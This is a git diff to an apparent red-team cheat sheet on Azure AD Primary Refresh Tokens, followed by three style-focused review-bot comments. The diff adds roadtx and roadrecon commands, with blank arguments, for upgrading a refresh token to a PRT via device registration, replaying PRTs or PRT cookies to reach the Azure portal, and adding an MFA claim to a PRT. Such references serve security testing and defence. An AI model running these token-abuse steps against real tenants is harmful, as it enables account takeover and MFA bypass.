diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index d6481ff..19783f9 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -89,6 +89,8 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 ## Primary Refresh Token +A Primary Refresh Token (PRT) is a key artifact in the authentication and identity management process in Microsoft's Azure AD (Azure Active Directory) environment. The PRT is primarily used for maintaining a seamless sign-in experience on devices. + * Use PRT token ```ps1 roadtx browserprtauth --prt --prt-sessionkey @@ -112,21 +114,12 @@ roadtx browserprtauth --prt --prt-sessionkey --keep-open -url * No method known to date. -### Upgrade Refresh Token to PRT +### Use PRT cookie -```ps1 -# Get correct token audience -roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file - -# Registering device -roadtx device -a register -n - -# Request PRT -roadtx prt --refresh-token -c .pem -k .key - -# Use a PRT -roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com -``` +* `roadrecon auth prt-init` +* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) +* `roadrecon auth --prt-cookie --tokens-stdout --debug` +* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:` ### Request a PRT with Hybrid Device 
@@ -146,6 +139,20 @@ Use the user account to create a computer and request a PRT ``` +### Upgrade Refresh Token to PRT + +* Get correct token audience: `roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file` +* Registering device: `roadtx device -a register -n ` +* Request PRT `roadtx prt --refresh-token -c .pem -k .key` +* Use a PRT: `roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com` + + +### Enriching a PRT with MFA claim + +* Request a special refresh token: `roadtx prtenrich -u username@domain` +* Request a PRT with MFA claim: `roadtx prt -r -c .pem -k .key` + + ## References * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
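Review bot: in the first hunk (`@@ -89,6 +89,8 @@`), the paragraph added under `## Primary Refresh Token` gives the abbreviation before its expansion ("Azure AD (Azure Active Directory)") and calls the PRT "a key artifact" without saying what it is. Suggest writing "Azure Active Directory (Azure AD)" and adding one sentence that explains why the bullets that follow pass both `--prt` and `--prt-sessionkey`, since the intro never mentions a session key.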
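Review bot: in the second hunk (`@@ -112,21 +114,12 @@`), the last bullet added under `### Use PRT cookie` links `[login.microsoftonline.com ](login.microsoftonline.com )` with a trailing space in both the label and the target and with no scheme, so it will not render as a working external link. Use `https://login.microsoftonline.com` as the target and drop the spaces. The same bullet ends at `x-ms-RefreshTokenCredential:` with nothing after the colon, and the first and third bullets are bare commands with no word on what each step produces; a short label per bullet would match the labelled style used elsewhere in the file.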
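Review bot: in the third hunk (`@@ -146,6 +139,20 @@`), the re-added `### Upgrade Refresh Token to PRT` list is inconsistent: "Request PRT" lacks the colon that the other three bullets carry, and two blank `+` lines are added before each following heading where one is enough. Under `### Enriching a PRT with MFA claim`, "a special refresh token" does not say what is special about it or how its value reaches `roadtx prt -r`, which is shown with no argument; name the token and put a placeholder after `-r` so the two steps can be followed.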